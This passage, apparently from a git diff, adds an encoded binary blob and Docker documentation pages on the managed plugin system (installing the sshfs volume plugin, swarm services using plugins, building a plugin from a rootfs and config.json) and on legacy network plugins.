zZexGkc@igEt5h_Uuhh26VNPDefnC3<CpGp*zNbB(4BL+8pFasQY-s$t~g` z zo)>tnlX4l3g@!G*1K#)|c6OlL(dFf5bhDS z>y&Z{oNqx+?$dV@M*1|MmZfQD5H^-=VhNYC6Q{wDCaCV56~|1a(q`qOm$r* z>pbJtQ|F|lj1F`|g1+Kp=b31{IJE~0p#6c7XI4(u=S&y&3&0UlpvIqITKJiCG=V3? 
z2sf>Q`~^lm5;iN&m*BaZD_)|M$fC~ZX?t70k@*WvWA%0E$W}j6`w~%{IZLDZ?bvvA zYL(CuwTg?7-?$ zCws)-)IBG>J8Z@a$-G6_-{o3SJ2!maF#!5D?lYA-uW;YF@g2@!hKi}Zz5OPrkjsSh zv7I277w*V5FZX7>tbv#augCt=J#+n{()oS(Fdc||eIA!26470khKji$jPgN2K$%R* z)mZm=Px?Jxn?d$Mv=p}`77_UZ-HJS6=ukrVs4F~v#|H~3JG%7jX4jRhOwEJ&HZXix z`oI&@INd4sUKCTdcu86bRjM5h_x3MAt)))4XmLIQ*>j^AmhXZqg&N4G|I&@$9ONfW z!D!h}GSX~Bk5=BhS(6?au&^l5>K>}JtC`u-HW1Psq2mNZiUWc&2a))Cr>`7Tc1)xN zm4xt$K+d^A_cs8#$DBwC8rvBP_0NgB>?txB+}M6;#4iw=+3!B|wPC4OhF@^RS>`(u zlp!WewONyh4jp0z*bJ(cKjIgqB#Y_Qi*=o5XO`kp4?HdNW-Hz zm?<3>of{8t3{tQ_8H|#ImvtCn%~r5}5DM-eiu_86>er}*Uc_=$W(zFaxrqEp+ zNh%5Qr7?Qsd?w|?zC91y*A+Zz))aUER_tRnuoSHZ^5V9C^+=vI$qOXh9_eVc%L21L zsK^T%Z#aj#5~D8`jmP)p;8O71j=4Q}DQ*hkL^c#+T6#QVBd!j>@jcjDSf-J0wY#VG z2LNZm2hAq2nkVK)e>|1rfJc6n4$uXC4BQ`HbY3@092LR9crJCgnpJUVq%(zzzla`U zzN7kFAfZh~6zl*OSaqVIM@@va&C*J4&>yoY1^#lsl2Bn^4CDD6Hj@XM&!3*t$Ot?A zak?T`CML?E`8N->n3r&-D~~-9t?w{>gD0x=#~Pu54RhN$tjk{@fqJ8wnq3%fuL}_b z8H7h)WNk{IwQu-hQLht*PW(Yn0)R{!UhzNyLVyAZ02tJCtHl8Fp?okgkRXD<&DOtJ z{a{mMnPXK2lz*Q*1qJKeqgF8ck#498N&-*l)dbCdS&1b008^dh{(l1wp~y|MpDDBc z`($4PC?!#tA#VyehzAzIY^$#o_V>vM*73b*hWD3RGb10lC9ESaN<08l7e*BX}Y1ax5;18R%C?Phym9rczE4Amp*IkdUL*fU6>TFMcsl#8=pLQx@vS zjuC`<8KAQaI)OLTl2D(UDxwb+)M9p&t_1O+WXiZ!Ai8(P|u?x2vLDQu_Pvvf!uxt5rh>XJX!`5DsaU+aUSnOxy_Ig_jEJOAbHep7|OuRP-1HA z=a3F(dr(Aj{A=^7UCniH84^H-SAf=M0WcCtIDVW7zk|6bnMw~Vb0#)(P83wpHa^ul z@Zy$K7a^Ey{_A@h2E&!d8^|SkoM0t_$c3cLNkfQ>p?`ZTJw3!(3Dk5fp zEU{ch6Im`gW#;xDFSoWpQhO(sKAS(P?)D4IO;AY_MPX2&m`cb|)|lOV7UB9cBozLXq8}dbUvHw`b2L5q^uPo&mUopg-4#+aR?c4S=jTdatsG!v5m;3dBn@_ z(OGds$VCc!BMJiO!K&qJCNB3e&Va98-El6Wr>Fm=n1zPM_TyHIpAy!zb-69f_?l2HZwaYT0=v_TR3J^%F~5-6Pp`aqRI#R4jB&H z5Vi6plFjH$7fp$!T`Lg#Dn zJARpP!X8CJRaweODXE*Kk@S&5nCqo}vP7R8P?-+z3x3}7QP2H3K+WEDhP_`VPtQ!W z9)y-NbCTA~y@n|ex1WFm=%f9o{LH%D};%Mi^b3%nbpNiuFS_w-LRWA9DgTMW;DZb$x zzA!CIA^h(1hdU+4f4duPWN&*^Xw*sg-*&cwlbPv|X^MBW)_?)m0veu=xI9bSXfOy1 zf7)zQ92)zJ@hk}EY<{7O_%d8-mIdMZwTZ8F*`|v8cNzcmS9$_m3}otTwmoh+KJ(`X z_dQ#kIuAk884kx^|DI5R*&0FfTl;oaEVRSc9x*{`NRM6?Y5hAF7c7Ld@1e{Bg1_w> 
z!Dfs>)H8pVg!#4s0zca_)BedNDL88XxqhZ^#6h>x7v-e>pQ>;(e_6BBVh=a z%kyyC0Vcv^A!O*d|GVx;iTluFF)IPnOC=o|Yd>Av9|&yXH4}Eb+z1l$S?+slytZQk z63Gx|8KC(j&7|9Q$z%3y*A8=12(D$c2stfP zWjQWes4d&u$g}*u+mg81`3lrI@c^O*4d!f4WcXl+l*jsWY>ELyPO`bu8sy{It@e6{ zK&9`?5K;U(G6$KacmxCf6PFLEhW4+5?Sm*;FeAkT$0-gd>0-}~Y-6#bm78x-x5eB= zcb}Kt$kb$$@Ncq|A56D1NvYK>L>(f@f z*WAVqd06e%?G~hbFO&sL6-}l(p|;TSW0za?Nk3m3%ME*)D!|=N#bX+9`hjV1TPa19 z1LiN&^y|G0u1*^lazh*KO}}?hgc51VwA8T#B$J3zT`6I5?B_^$rByWXZi`^u)uq{m zmsOR*rFFr#)CzLa3qZfFAQ3er;jR$=uO4lnJiEYg-^c=Fr;H-H-J98=@5m$f_g%oI zt0#YFwXLCw+3HS0BrD`AeiT`}Ak~VZ7yv=&+Qo9vdpfV@!T6_+2>|dc>!G5;vPa!T zz!{4`tVxI1TkeVX!5o<;=oPC-Nw@{Xn{5K zavq3TtPpR@gGa5wNfx5+b=rJSbUGQ5QzkSQ!i-4mJD^|ZSofsA0ROz25(Yz*oaNKTc6O4#b=Mjhak7qjREIPRf;7w$1Nzr5=vpmp4F>=5A7l6fbUHK4zx>A%;Xhr4 z9o7HR;0Vt$Hb?!d`CWi^GCn%#-2VGyAB4c5P(ZDb-je?+eAXySm~}uF4vF9WWB;;wiu?D=;C}$F!dj zi6-;khoKw)I3iH`Q%%ij{t`u6^s8X+UByfO+giYJraSu6_n`F+L)RHGUXT6P`e42r z>+f1+|1ZsV)BWjS1t}LH$@~_Yrvl6ma{_aFxe{8s4Yz;=PzujI`kE~Vl+0Lvciu8m(^DtHCLyLc=CT(Rgt^INA8;>p6UnJ~uc03inj2r14XacGzp z{)$ALF7^OJ%7pNNo78_)>D|%yk0JmIsv}b~Na&Y@MNLY`d5s-HUf8_vA*1$6(hpFg-&`7 z-1B1CEM(_yg(b6wPW|}J4je@lPQ4ROB#)W&pX|wPeLPA&*>T80kDNfO$}?{CTLNuc z3uvAuoLDs=MXHltM}>zl*-N^)+Lsei4P(>tii#TGFls^HQ~^Gvg2cDMv=~|hm~r3Y zYjjI>9fSHC|4LzSesi}x=HebWdI7U>`gjVj?N|o{yk~B_#KfPo4|qtN`xr3%VFyhu z&k2vM`>WwXsa{C5bms_Kpa#^30Wd{kD|tB~5)ZSrYS+ZP^bMe#rWM?O&DUe)wso!> zMlIffyLau%5b$g@5EoP-;r9S^M{5xBm%weX2HwvKPtWr{J2mW>R+FG1t2>O0__ZBw zf-#XIs)`X9%Ckw?J1Tieo(GBdK$qeqeWr#&#{ZemqLCDhA2jKxC(1oiTAJqf$7`VH76Rls=!hfvcAX6VaTD5#&5~ z#~~^lZ^~zHfRTGvOpavfYa1@<4;AV?I^Pw?mT(9${2B*eF+*IW6o0TC&$At?GHKbH z4?0$%!6x|)cT_WuRnt)jR9p?vT`PMV<&aFB>2_-egI~l&JI^mN8g6X@zN2?VZde@B z6DVT9%_LR)^j5@OOIh$RX1CO=ZM*z>lWE}wfC9I}Z_Ty#Gl9nP1K8R8VGY3xAV42( z=H?_v!(ClssYj%F@TC>Gi)Fkwn;nY{I(NW-L0qNhT%NUdlcF760TonZO2z@0a&LCe zw3Ny$Iv&38xw^Dah=S7?ldGQ7jwDF?Z9sCFd+R(wsQA)tOCd$HHrX2HM$^B20_(@& z^w?G8lE+j7I*VaVmFDH7SZ39`M(%7c6)+7W#e<v=IB?C5RBx!ld$tX+}my+}I4AqcY(!B|tRvFmAC4TM4(_wAb}9Rn128(luO@ia(P 
z3BsaTl0laTvGLHo_J3mifN!B79rTJ$5(YJ%?vC>s3He|Hwj~U;@tQVc`5;Wt)6saSA&dhRyKVnUbK6@hg!7&=!>L^&4l2BoMb~Rh6OKwS z1_#}W)O8B{j_m!a)nsW|FnejEGX_ya5&vxUZ9eT-4VI;R-$e<>`*w6K@E2JwZ@j=( z+JrfKy-`v{Nn_ooFlyw+XEo;H$mru_SdcRDtXo8jR`I@Bz*vS1eg}sjQ#L*W)1}t1 z`xr^`VO`H7f_2^1Ls<;aYqU)aHo;#TaKAjh)z*fY?6E25{K)VQ0b&$Ry!mMI`NEUq z_n>y@)Vftn7%dUJ_(mUT3LAP2|shA~$n37lRY(jmrU-hqZyZHW;h0y!l$A#oi z46h)WGdV4d^$3HMO)K{2=O6{>sXLTUK{+}fU-x|3cwu<^y6<-)kc2D`cz5WDumiI! zh~7UeXTCvjj_samzwS?UQl+dwWxW!5TTE(?b%`ejzvdqsn1&JJi~i9gjGai5BgK6H z-<-p2onnzO1`E*bkZ2U+kL@3+1`nu*@@?THqVcb*3tm8lA)qH(4!Zd(GzyV&P}e0p z5^}*M8G{bLp~dKka}z@&++>iJ{W6Y}Afhd)60k*fJsv&qyjqy?uFW?|%+y0<1#0N}u5qNxNs)A!?a)q^VG`{yqm zyIuH?(L&d1Ol;xCa`&&=E*n*oh=cqAB3KvhK78``OJ_U)PHdwG{}JNFF-q^j0zQnq zsrU;U*Cjwb!J9WO2ae3^B%ver7#kQcR=;1JVg6 zil1YWLEmTH?+^Y%p`~mZQu6)d*$MSvge{Z*H+J2dqfC>q4CQ&r^Et5GIH(h{h&qkX z?8~RJn*X|kzu{nAMa(}3O7!gZ7GBg9HD&JtisxStv`Dd8!dQl9`rsN5&O3m_6@dIS=V-ZCqsHRzL zI4+OH1as28p*?y!`ZxCNe@;+)NtwW!ufv-C{K?P>f)8%Bf&(M>{$ZE!4gvIm)YL*SfxF@zLjk!YCmzwWO1hW|dJQqsGvBDJj0Br$J8<*sS<$3VYt z>nxhV+{gBx_5M8_O^M=)Y|?mD>4L3n{;%m4CVEI;rbR;;U8WIb2MpGGKm`svn<(lz9HAna&&)F5qF30fz$O#j zn|Fp7&sP`)<45yD?*^<5o$1!$qvT{zrjXuFtvdZErS5Qv4bjydLu%s~d{}vyk&2Va z>5G~uQq_i&Z7WPp}t)KRT@}nQ!04AMn-mWA4^tH}2zM-c`SSHWl(}(tC zkxzzL&AK$GN5U^E7M`H&K$gmRYclJ1TxmCHd%gpvRe3K+a&IGv%cg2Gs3jUOmq$8? 
z6E(D4TwiqQkxB~qH2HAHmicN9;CqP-L738=140r9p^qJ~YKH6Oi#99P_?wzy8m62@xQkEkty-vLwEWF)5mR(XhK(am6cY_tXT)% zs3~4<)(&-F>St-3=!D>mFzN)I6^zknTi*`f}h;%@*Y|}qi75q#Xme?XJx7reH zVUm*c$$%-6-!@GY?__QTYwimm(AseFkJ+T6&KO2&O*tIeL`1>2FnHd#27AJ6Ap3Vc zQq#gH9iu<00QwnDGs+Y*8jIS+r@iN_t}*hD^bmt-D$kStBA3dnEaiPK@~f%azKQB6 zTFJRz&S%ErfBK6c22U<|PrF7q&(M&L3G%D;m*SnQ(%;h@w(}#n|7gk0B)*ASC`+ph zDzm%+9i6}LDTBdNOfGSuolvYx>Tj>2^`-ZgO1fGiIqK@+`Pk=JvO|nPZEv8puDwBY z>LtO6C!wq@&32qu<{{H^$L)asQQddHQ~AgLm&|0oDcdm$;n<<z ztYh!&y;s>QTU!d*LK(^4gwONteO=$b;QPbp^MjwxIoEYN_v?PWo{xDLURdqz`QJXt zp2?&xJ{*U)b^d)@Ix&7J#r1sFx2rJh{1~rZ?@2SsV=W94gNDuZ_TzeHtdh>%myNm6 z!xbjH(9K19>kCiDJfxaM#j8YpLB9kz`%)PWksp8_6TqOI@6niS{)@_Eej{ zZcQnmwP{G(ZPBNw_4Y7(7V}TQ{|lc7uwsHN6#JxM^n_kJ4Ie;MDL@1xRP~c)ez)*8 zn*ny);j$D^wz!&b9ab^-mlDt>_YrsatJ|K)UVidtOY>N36E6ELh>mDL#5Rv;qYerv zVbJw~Gw-m+6(~Swz;mT$oVCOq4c4oT3oMm;C-7+gguhteACfG_j>Mz@+_G_Lq(vj8 zEvJAfR1pp!Nunjh9Perj_sc-PGv>hqqef>2#i3|wgf z*b)*XU95KC-3p~+;89oZbMh_lc*jfkglDJB`KlfFQIvK@ z%q+__?P5sCBq7J;=0d*!f;531Xl$vV;nh=XgYGry^6Nf-JS4sLtHNJ5BBUt|j5~s4 z$|U4xai5T~h|0FZ5~SGWgQ%{fmi5&cWejNNvAp`|rSba8wgvDLm03G=R+n*q1xN_| zi|GKz1bpTW(7dbq_fo+G2F*x`h}ul`(kv!`CZxXv<$pn5*gRJnzPBq#&r13YkZM>; zU)=cjNym$`EFY2|?QmwyuK-ueaeA`%IvoxAQ&Fp(qkjqu=_gPMUy=++dtUUg`u;I*$=w}!?d!YT5m+bu5?qx_K>ubudLPXe z=o5_$7Mh-^g7b9BMp^0YwJ=Uy{|NM&3Y@z;gXn^eb`}9GgFqj!+Y<=ruR8x85qb)` zPCjt=0WaA;A{-tVJdFbm$9K^&Ioo(EjZo=l3k8T-r-2`VOp>}vUbxc$sCfAZ&x!41 zLd3xG_gHP|6YVm4-~f#fw4E7`3`Lq!8_#@va6t2|HZ7wwoqnH%uv3=iQ)=I3o7vT= zRwEdfi!v_*;->AMhBF+k4`;f%pp&m&HN|}!tz*u|G`aVr4C=S82;%w2@`5v=9+SxW z(T`3nJ-B7>R0cWCTm zz@|tqjje&?>#al>>21Pco_UXGGYA-c+DUxgF4JR6{3Y->#bBuOf}IC3_ChqE8PSCh z6{!&vCwvOQ=KZg`yXynk$N}~rtf%|IG73v_h_)A{afE%tF!Q7k8tV;Rr9r5J& z+GW+~-mx{%KN$!L@`Pd=;9^WZW44Jqbgpm~+xy?k0nW2HM_?wB=P?KD%!7q=w-f~V z>%hr%JRDi9(<}uoZ`dCQf%}U`q1mjgURr6tO1Z~|mBWpAIC&fhn(@!LD=QxY+{jDs zez-%|@%Tcw_XCGNLhql^pDPRclp%d|QB~(3@;)KU-o<;|N;&&o#N-@`Y8whj_m;ty zYGgas2Uv(E2lJ~##J`@=^ZH&MKFWHXra+H&+mjl3^j!LuV3EHQ(Jq?sX4O2b{>$E7 
zm^*_eReMx+50g*(XtHCdFW*Vl_7)ZAWm&C8!}@bEM_OH%mcc9a4xCmMW-L|HR7Q5F zrly3%{ zgkR!PJLS>`6*}vv*_(MFkHk{p>+OituLG^<>S3bvhP*t_5pE?uznem<;Qy}Df2*>7 zEqvheaF`d#a1ClCSRA~#ecwI4z6#eSau?pO?u*!UDNB<3@G;!21)llk*8KT7QiJzm zVSR$CkBlT*IS*bK3Ub`%T2_3e6tSb#-0eI*mv6l~(a1nFd>}<)ibd3oZv#>XTzwx~ zwi^n~52Ky>t_ui0}-pv>G!{?qOzlmV;%-cz6rV7hO3hZnQ z!xQsdy6QK`({ljQaLZLC*LCFh5O(}7hn(#CR`cql4$ZI`?=d81w2^$5e@1n&?52=g z=m2VrEVqM28oRhu2NbcbohcndJ8+nH>IvQvJJrjG{S*?onOvL&ED;|s<~czwBOQMu zsp)<5AJ2+i=wLo~txKU7beb@eze8BQKoGD79VP(-~6OPt;WJ zPr~?y%B-~$iy9`{m`$KQN;od(uxh&72XyX)*5wwRWWzWksU=Ex{LbEeLha(@U+wp4 zciVv=aX?pLw8%ufe@l1kk>J$4ND5{!qJGi_tGTLDbdV2u2=iyybgKW#K}xYyVf{_d z5oOt6;qERQ@Z4cPl4Y(0(#>6{Nio4VpN!d6+H$?}W{p4HY-+iCsg23-h z&@6uS`(La0KkVaH#NRUt%&xnvu{4RU2+z5`&{{obsF|bb= z3nc_bG&Rs~q$|8m~-etE+C*k176>Zd!=5li@NKu;qB$Yq<&QJgRTC!G9E$gtMU`~4t^|k47 zarNL5ephp;KV94x1q`G;cL!M+{ciCdQnek21{*l<{(Sldos*7f57_Pf5K(`0HjE^7 zwSzo$!yFu-h*IVr{1VTsY^I5~;>VPTfl|jC8Ug9~p7$g`7Y*&ihR6A$R{aO51fo5r zzMo_Bi0Ny^Q#Es8ZBGuNK8qjQ^psP_6H_H_58Z9pQz!z?*8%-r7w9@&$m7Ae75C(T zu;hq^W3N@dh;`Sr6$&6q6ho=80(vp*w{(C49s*2aQsS^n)wnj)DT5wFIB@g~GIT(W zCcBF05$vC6pSO+c{|(21qiaE~E50C_m3SR&p7)fH_U70Dkb!7n2us&g4vb3{Aq7hr z+PEQW&vxdh1gX&oi=C(wJQ~(3GceB&jRQ~3vh$qHC9l&>Fy!moxOn}u1xrvL`cHFC zGAg8vv+NzBQscM&wzLR7?AyB)107xCxVXMK;2GR9ZyUIrf*XM5v5$v@@JAj$K0(b^WDx*A6(#xvTZ!}PbI zsvzr@!Nb4-pAKb?&Z;19C-d5fB^wd@$LBAEd*X70W;3Ap(n({8<0wkxq{`6J70v!P z&5aT!#!zt7#imRLi{-?8OZlt*w}U(3fAx$04~|(l+CFKhNaOv;#QyHOY`yF6 zXiJjF@d7&ctP68U@Rt9Y@_{;eex^{1jD+PsDneOK5qu3~|Nngr&uIN23q>kpTm=}a z>Z-oPMJq@)YeAK~Nev>mJ%Iw_+Y%SWa^5NS(B1pk(}@@`{H*a{vyFxEP8E_@(nMLM z)A+GFDiW_<%>Pn6DF0|`KMUXx9hJ9261pWVa0!W4(z%K4Fst(ezxeXkH&C3BIX(4r zN#Pl=;Ud2g;3jSTiHXOkt_=T1T0+OE#vgUo4hrZiMgShdF8~nFcbJ9)_#JH$C%`ki zl_W7cJp@qzlAqdSg&Tg>M6(UM{s17n?fL`2 zQ`z?KuL+LZiESx_$iskC!!8WK7|qb(0NSp)7^PRth=7Z>isHy2!r7XCVJD{Ao zHA%3@c#VWD%Oo`U9Aj-qsU*p1IK{gx9p6P9h?rScNaDPFu+(3Stb?O0WX97 z0NXtQ(|aQf(vdIXokMeA@hgh@1I=C1$Kt8>Z3Z^UtMIm8(6O(LSpS~%%bvDi0Zr;w zbv54H68G*dg>JA%Ukf6}ARGV;U_#T;YO^jdrEamIp`mvab%4tr1kHO8$WmRny*glQ 
zuSHT^y727}=G+P&got|i;oe#$yr}^3Yah4fd&5AA7z&0U_gf3tOU!;uH2vbN9OBp9 zQfg9qPR?BN-maoG-{GAptf};2*jU{r5rH!oVlXDiPaTv1e*~AMj))pR!I=WlON}E> z)$#b_w_KSzfQR&9f$BpWeAPRI88LC+2T4X_FA(OyQUs)z8@^Hk9YIAJ$xvm!PZB7F z);klo-y`>ch*DS2kTUG)=_y7!*^gLdybKD1uvuilV=arQYwrPuxGIPmDe*&O-3oOWl!pL4ZQqngo|(9JU_>ruvq9PBv5}L2A8(1Y`oSQzeUmoK z3C_aAQ?Oi=3tN3CT9?ZN3JW2<4*_-5$j%~E%+bLeMyHiKG$cqsHqm(_pUykqfu$2n z^!4v#AbO@-`$*S2V!vns91Z-ZaOaIbrb%k^q8yCDcjKu#n!SkAf+lxxS`;B%jY%tZ z=$$n@4<&GfA09%kRf*F+3l) z*5)R(pK7!?9YMpH4j{Q92tt(GaNle?{Wi7JqOcdV!SVWCuZ3_Nd)Q~3jYaI;N3muR ze7Kj@nA<03d3rh{Bh(%lQ1V>M;}*v8$c7Q}Dg{0^#AIJst?&POG*MwYabr!KaV@Q| zVIhOH-}}?T#GaH(#)8Pyj|U}3M$K7@^K=Jk=t^pTvoJY(`*IIY&wmyc7A$;yGZpNi zWrLlP_%1Q+Ovm9NHYPT9Gxs=WChS{eW25AGmxm7@7GGUwlco+0Nlj%m7fvb47)@*_ zE-TBsYbU`}5RFps*{>d7>HO&&IyGe)laYa@ymE_p<;EoDF?$(~60NGMOB-~wZ@Ts< zFVnvN{d?^pR9?uAKgug5E{@}a)vK|o(NUF$&uDiZ_l?+$Gm{f7=_DNU81P*jn4T7B zF|Cxiaf8D+GAb(Qqg5`8hklt}sh>UH(9n>Don5%Y(*3)4v!)oAencj-k`60+W+o;U zJpVv7cKn3-sg&7{BO^UMn{-M_%7h69y)RCAK1k8WM`p-waR2dnZD3+TyS24t;q0u%#Kc6*G1)$|wG}t?MNCXgw>4_#)JTCV zJjSQar1T%lnSHi)?qQM7R(Yv3ipK$M1_2WsX;+v;r-JM1t~oh7D|lqfuH$viMrOop?yq{o*Jp5Kep4{aAv%Brru zx9=t6j6*&AzOcBcTvk~bUQlqw%}RDsQ}<6HWz@;+tcAZe-?f^~PKCp>PWWbGpPvlt z>+6>shKG|nucChaURi;CjfDL(E-H$2yNiUfkeOpr;&QfZMj!PB!bastQgKa9%}2}{ z%zR3Rjnn_?r|qwIiT8{b6H46q{d<;; ztu0$$FZnsH+i5;#W@ba?j%iqnJZ*=^W!GBWaI2NUj2h|5;qD*TJ9s1|Q>MyoOq?c5 zc0fm# zGZtGCpOC<_va*u*+(m(mj7+iUsfWj1Ch}lmQBlPee>uNRSJWpISBMwAGWQ#8h9yGD z;+&j-j3B0;o12@LHp#~150@4fv%L6~g-{|+Ed9!|$BNjL^mJWeVPTyc(VpE> z&CShA$8x?kN%8T~>1u5xK?+i2J<8T)jo$_bxh*X%OUUEz5e*pKuCbfum!4pcAs!`D zljrPAi?JqBA=#{VH^*^KQ@U;@DSqGM@QWZ%y+V5J-@#k&HFsUEr+1@=WH?xk>+9>o z-v4ATd?1_>a{1j468QZMLIQgHNLvi%J88@VEcV4USqa6*0U{zIB_!CUfu+^eNP}$D zmLC&d9q)}xHEX|rbL*8Ryph2~X{f7v+kX4nU+23(m(7a%Ha~CWY%D1$d0ttF4?fAo zM9$mJ#L3(|sev=DGg+qVnC)(ntHT>DDlJttG&0Jy7B-?UGr$o%->*6odqE~k&O%a& zBfWaQVu5ah32wSi{kCIsTiX>i|M1brdhNXgMzov0zwdOmH$*1Bj8l|jM^Wt)QMK>U z=EV-7fbai#n_)Jes=qyv$qFivHO`FbB)MrEGI@!-8@;UeK 
z-^Abla@yPbeBDE;bH$yD@5)%Hs$R)OGQ&hzP@H%qerHBX_QyUfE*32=FaI+-I=cNW z7>mVHV|IJB + +# Docker Engine managed plugin system + +* [Installing and using a plugin](index.md#installing-and-using-a-plugin) +* [Developing a plugin](index.md#developing-a-plugin) + +Docker Engine's plugins system allows you to install, start, stop, and remove +plugins using Docker Engine. This mechanism is currently only available for +volume drivers, but more plugin driver types will be available in future releases. + +For information about the legacy plugin system available in Docker Engine 1.12 +and earlier, see [Understand legacy Docker Engine plugins](legacy_plugins.md). + +> **Note**: Docker Engine managed plugins are currently not supported +on Windows daemons. + +## Installing and using a plugin + +Plugins are distributed as Docker images and can be hosted on Docker Hub or on +a private registry. + +To install a plugin, use the `docker plugin install` command, which pulls the +plugin from Docker hub or your private registry, prompts you to grant +permissions or capabilities if necessary, and enables the plugin. + +To check the status of installed plugins, use the `docker plugin ls` command. +Plugins that start successfully are listed as enabled in the output. + +After a plugin is installed, you can use it as an option for another Docker +operation, such as creating a volume. + +In the following example, you install the `sshfs` plugin, verify that it is +enabled, and use it to create a volume. + +1. Install the `sshfs` plugin. + + ```bash + $ docker plugin install vieux/sshfs + + Plugin "vieux/sshfs" is requesting the following privileges: + - network: [host] + - capabilities: [CAP_SYS_ADMIN] + Do you grant the above permissions? [y/N] y + + vieux/sshfs + ``` + + The plugin requests 2 privileges: + - It needs access to the `host` network. + - It needs the `CAP_SYS_ADMIN` capability, which allows the plugin to run + the `mount` command. + +2. 
Check that the plugin is enabled in the output of `docker plugin ls`. + + ```bash + $ docker plugin ls + + ID NAME TAG DESCRIPTION ENABLED + 69553ca1d789 vieux/sshfs latest the `sshfs` plugin true + ``` + +3. Create a volume using the plugin. + This example mounts the `/remote` directory on host `1.2.3.4` into a + volume named `sshvolume`. This volume can now be mounted into containers. + + ```bash + $ docker volume create \ + -d vieux/sshfs \ + --name sshvolume \ + -o sshcmd=user@1.2.3.4:/remote + + sshvolume + ``` +4. Verify that the volume was created successfully. + + ```bash + $ docker volume ls + + DRIVER NAME + vieux/sshfs sshvolume + ``` + +5. Start a container that uses the volume `sshvolume`. + + ```bash + $ docker run -v sshvolume:/data busybox ls /data + + + ``` + +To disable a plugin, use the `docker plugin disable` command. To completely +remove it, use the `docker plugin remove` command. For other available +commands and options, see the +[command line reference](../reference/commandline/index.md). + +## Service creation using plugins + +In swarm mode, it is possible to create a service that allows for attaching +to networks or mounting volumes. Swarm schedules services based on plugin availability +on a node. In this example, a volume plugin is installed on a swarm worker and a volume +is created using the plugin. In the manager, a service is created with the relevant +mount options. It can be observed that the service is scheduled to run on the worker +node with the said volume plugin and volume. + +In the following example, node1 is the manager and node2 is the worker. + +1. Prepare manager. In node 1: + + ```bash + $ docker swarm init + Swarm initialized: current node (dxn1zf6l61qsb1josjja83ngz) is now a manager. + ``` + +2. Join swarm, install plugin and create volume on worker. 
In node 2: + + ```bash + $ docker swarm join \ + --token SWMTKN-1-49nj1cmql0jkz5s954yi3oex3nedyz0fb0xx14ie39trti4wxv-8vxv8rssmk743ojnwacrr2e7c \ + 192.168.99.100:2377 + ``` + + ```bash + $ docker plugin install tiborvass/sample-volume-plugin + latest: Pulling from tiborvass/sample-volume-plugin + eb9c16fbdc53: Download complete + Digest: sha256:00b42de88f3a3e0342e7b35fa62394b0a9ceb54d37f4c50be5d3167899994639 + Status: Downloaded newer image for tiborvass/sample-volume-plugin:latest + Installed plugin tiborvass/sample-volume-plugin + ``` + + ```bash + $ docker volume create -d tiborvass/sample-volume-plugin --name pluginVol + ``` + +3. Create a service using the plugin and volume. In node1: + + ```bash + $ docker service create --name my-service --mount type=volume,volume-driver=tiborvass/sample-volume-plugin,source=pluginVol,destination=/tmp busybox top + + $ docker service ls + z1sj8bb8jnfn my-service replicated 1/1 busybox:latest + ``` + docker service ls shows service 1 instance of service running. + +4. Observe the task getting scheduled in node 2: + + ```bash + $ docker ps --format '{{.ID}}\t {{.Status}} {{.Names}} {{.Command}}' + 83fc1e842599 Up 2 days my-service.1.9jn59qzn7nbc3m0zt1hij12xs "top" + ``` + +## Developing a plugin + +#### The rootfs directory +The `rootfs` directory represents the root filesystem of the plugin. In this +example, it was created from a Dockerfile: + +>**Note:** The `/run/docker/plugins` directory is mandatory inside of the +plugin's filesystem for docker to communicate with the plugin. + +```bash +$ git clone https://github.com/vieux/docker-volume-sshfs +$ cd docker-volume-sshfs +$ docker build -t rootfsimage . +$ id=$(docker create rootfsimage true) # id was cd851ce43a403 when the image was created +$ sudo mkdir -p myplugin/rootfs +$ sudo docker export "$id" | sudo tar -x -C myplugin/rootfs +$ docker rm -vf "$id" +$ docker rmi rootfsimage +``` + +#### The config.json file + +The `config.json` file describes the plugin. 
See the [plugins config reference](config.md). + +Consider the following `config.json` file. + +```json +{ + "description": "sshFS plugin for Docker", + "documentation": "https://docs.docker.com/engine/extend/plugins/", + "entrypoint": ["/go/bin/docker-volume-sshfs"], + "network": { + "type": "host" + }, + "interface" : { + "types": ["docker.volumedriver/1.0"], + "socket": "sshfs.sock" + }, + "capabilities": ["CAP_SYS_ADMIN"] +} +``` + +This plugin is a volume driver. It requires a `host` network and the +`CAP_SYS_ADMIN` capability. It depends upon the `/go/bin/docker-volume-sshfs` +entrypoint and uses the `/run/docker/plugins/sshfs.sock` socket to communicate +with Docker Engine. This plugin has no runtime parameters. + +#### Creating the plugin + +A new plugin can be created by running +`docker plugin create ./path/to/plugin/data` where the plugin +data contains a plugin configuration file `config.json` and a root filesystem +in subdirectory `rootfs`. + +After that the plugin `` will show up in `docker plugin ls`. +Plugins can be pushed to remote registries with +`docker plugin push `. diff --git a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md new file mode 100644 index 0000000000..6ac914e366 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md @@ -0,0 +1,98 @@ +--- +redirect_from: +- "/engine/extend/plugins/" +title: "Use Docker Engine plugins" +description: "How to add additional functionality to Docker with plugins extensions" +keywords: "Examples, Usage, plugins, docker, documentation, user guide" +--- + + + +# Use Docker Engine plugins + +This document describes the Docker Engine plugins generally available in Docker +Engine. To view information on plugins managed by Docker, +refer to [Docker Engine plugin system](index.md). + +You can extend the capabilities of the Docker Engine by loading third-party +plugins. 
This page explains the types of plugins and provides links to several +volume and network plugins for Docker. + +## Types of plugins + +Plugins extend Docker's functionality. They come in specific types. For +example, a [volume plugin](plugins_volume.md) might enable Docker +volumes to persist across multiple Docker hosts and a +[network plugin](plugins_network.md) might provide network plumbing. + +Currently Docker supports authorization, volume and network driver plugins. In the future it +will support additional plugin types. + +## Installing a plugin + +Follow the instructions in the plugin's documentation. + +## Finding a plugin + +The sections below provide an inexhaustive overview of available plugins. + + + +### Network plugins + +Plugin | Description +----------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +[Contiv Networking](https://github.com/contiv/netplugin) | An open source network plugin to provide infrastructure and security policies for a multi-tenant micro services deployment, while providing an integration to physical network for non-container workload. Contiv Networking implements the remote driver and IPAM APIs available in Docker 1.9 onwards. +[Kuryr Network Plugin](https://github.com/openstack/kuryr) | A network plugin is developed as part of the OpenStack Kuryr project and implements the Docker networking (libnetwork) remote driver API by utilizing Neutron, the OpenStack networking service. It includes an IPAM driver as well. 
